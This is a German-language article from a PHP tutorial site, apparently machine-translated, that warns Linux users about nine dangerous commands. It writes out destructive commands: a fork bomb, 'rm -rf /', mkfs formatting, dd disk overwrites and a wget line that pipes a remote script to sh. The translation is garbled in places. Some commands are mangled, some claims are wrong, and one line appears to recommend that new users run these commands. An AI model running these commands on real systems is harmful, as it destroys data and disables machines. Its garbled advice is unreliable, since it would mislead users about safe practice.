Heim  >  Artikel  >  Backend-Entwicklung  >  9 Befehle für den vorsichtigen Umgang unter Linux

9 Befehle für den vorsichtigen Umgang unter Linux

伊谢尔伦
伊谢尔伦Original
2016-11-29 11:00:59992Durchsuche

9 Befehle für den vorsichtigen Umgang unter Linux

Linux-Shell-/Terminal-Befehle sind sehr leistungsfähig, selbst ein einfacher Befehl kann dazu führen, dass Ordner, Dateien oder Pfadordner gelöscht werden.


In einigen Fällen fragt Linux Sie nicht einmal nach und führt den Befehl direkt aus, wodurch verschiedene Dateninformationen verloren gehen.

Generell wird neuen Linux-Benutzern empfohlen, diese Befehle im Web auszuführen. Natürlich gibt es auch Leute, die diesen Code geschrieben haben, die das nicht glauben, denn das ist kein Witz mehr du schreibst es auf.

Hier habe ich einige systemschädliche Linux-Codes zusammengestellt, damit Sie sie vermeiden können. Denken Sie daran: Dieser Code ist sehr gefährlich und kann sogar geändert werden, um noch schädlicher zu werden.

Es gibt noch etwas zu beachten: Einige Befehle sind nur dann schädlich, wenn sie in Ubuntu das Präfix sudo haben. Andere Linux-Distributionen können schädlich sein, wenn sie als Root-Verzeichnisbefehle verwendet werden.

1. Linux Fork Bomb Command

:(){ :: &};: Bekannt als Fork Bomb, handelt es sich um ein Linux-System, das Denial-of-Service angreift. :(){ :: & };: ist eine Bash-Funktion. Solange es ausgeführt wird, wird es wiederholt, bis das System einfriert.

Sie können dieses Problem nur durch einen Neustart des Systems lösen. Seien Sie also unbedingt aufmerksam, wenn Sie diesen Befehl auf der Linux-Schnittstelle ausführen.

2. Mv-Ordner/Dev/Null-Befehl

mv-Ordner/dev/null ist ebenfalls ein gefährlicher Befehl. Dev/Null oder Nullgerät ist eine Gerätedatei, die alle in diese Gerätedatei geschriebenen Daten löscht. Die Eingabeaufforderung für den Vorgang lautet jedoch, dass der Schreibvorgang erfolgreich ausgeführt wurde. Dies ist es, was wir oft als „bit bucked“ oder „schwarzes Loch“ bezeichnen.

3. Rm -Rf-Befehl

Der Befehl rm -rf kann Ordner und deren Inhalte in Linux-Systemen schnell löschen. Wenn Sie nicht wissen, wie man es richtig verwendet, werden Sie nur weinen.

Nachfolgend sind die häufigsten Kombinationen und Auswahlmöglichkeiten des m-rf-Befehls aufgeführt:

rm-Befehl: Dateien im Linux-System löschen
rm -f-Befehl: Nur die Dateien löschen in Die Datei ohne Aufforderung Lesen Sie die Datei
rm -r-Befehl Schleife zum Löschen des Inhalts des Ordners
rm -d-Befehl: Löschen Sie das leere Verzeichnis. Wenn es kein leeres Verzeichnis ist, wird der Vorgang nicht ausgeführt
rm -rf/ Befehl: Erzwingen Sie das Löschen des Stammverzeichnisses aller Inhalte und Unterordner (einschließlich schreibgeschützter Dateien) im Befehl.
rm -rf* Befehl: Alle Inhalte im aktuellen Verzeichnis (aktuelles Arbeitsverzeichnis) und Unterordner erzwingen.
rm -rf* Befehl: Alle Inhalte im aktuellen Ordnerverzeichnis/Unterverzeichnis zwangsweise löschen. Dasselbe wie rm -r.[^.]*
Der Befehl rm -r.[^.]*: Dateien und Ordner mit Löschaufforderung löschen

4. Mkfs-Befehl

Wenn Sie die Funktion von mkfs nicht kennen, ist es auch ein gefährlicher Befehl. Jeder nach mkfs geschriebene Befehl wird formatiert und durch ein leeres Linux-Dateisystem ersetzt.

Für die folgenden Befehle sind Administratorrechte erforderlich, um die Festplatte zu formatieren:

mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs .minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat
mkfs.cramfs kann das Gleiche tun wie der obige Code, erfordert jedoch keine administrativen Quellberechtigungen.

5. Tar Bomb

Der tar-Befehl wird verwendet, um mehrere Dateien in einer Datei (Archivdatei) im .tar-Format zusammenzufassen. Eine Tape Archive (Tar)-Bombe kann von ihm erstellt werden.

Beim Komprimieren ist es diese Archivdatei, die Zehntausende Dateien mit ähnlichen Namen generiert, die im aktuellen Verzeichnis statt in einem neuen Verzeichnis angezeigt werden.

Sie können vermeiden, Opfer einer Teerbombe zu werden, indem Sie beim Empfang einer TAR-Datei regelmäßig ein neues geschütztes Verzeichnis erstellen und die empfangene TAR-Datei dann vor der Dekomprimierung in diesem Verzeichnis ablegen.

6. Dd-Befehl

Der Dd-Befehl wird zum Kopieren und Ändern von Festplattenpartitionen verwendet. Wenn Sie es an der falschen Stelle verwenden, kann es gefährlich sein.

Der dd-Befehl ist unten aufgeführt:

dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda
Der folgende Befehl setzt die gesamte Hauptfestplatte auf Null: dd if=/dev/zero of=/dev /had

7. Shell-Skriptcode

Manchmal werden Sie ausgetrickst und erhalten eine Shell-Skriptdatei zum Herunterladen und Ausführen. Das Skript kann schädlichen oder gefährlichen Code enthalten. Die Befehlsform könnte wie folgt aussehen: wget http://some_malicious_source -O- sh. wget lädt das Skript herunter, wenn das Skript eingeschränkt wird.

8. Schädlicher Quellcode

Vielleicht gibt Ihnen jemand den Quellcode und lässt Sie ihn kompilieren. Bei dem Code kann es sich um normalen Code handeln, es kann jedoch sein, dass im großen Quellcode bösartiger Code versteckt ist. Wenn dies der Fall ist, ist Ihr System angreifbar. Wie kann man es vermeiden? Es wird nur Quellcode aus vertrauenswürdigen Quellen akzeptiert und kompiliert.

9. Dekomprimierungsbombe

Sie haben eine komprimierte Datei erhalten und werden gebeten, diese scheinbar kleine Datei zu extrahieren, die nur bis zu KB groß sein kann. Tatsächlich enthält die geringe Größe der komprimierten Datei stark komprimierte Daten.

Solange die Datei dekomprimiert ist, werden Hunderte GB an Daten extrahiert. Zu diesem Zeitpunkt ist die Wahrscheinlichkeit sehr hoch, dass übermäßig große Daten die Festplatte füllen und Ausfallzeiten verursachen. Wie kann man es vermeiden? Wie das alte Sprichwort sagt: Seien Sie nicht geizig, akzeptieren Sie alle Dokumente, akzeptieren Sie bitte Dokumente von vertrauenswürdigen Quellen.


Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Vorheriger Artikel:Einfaches SOAP-BeispielNächster Artikel:Einfaches SOAP-Beispiel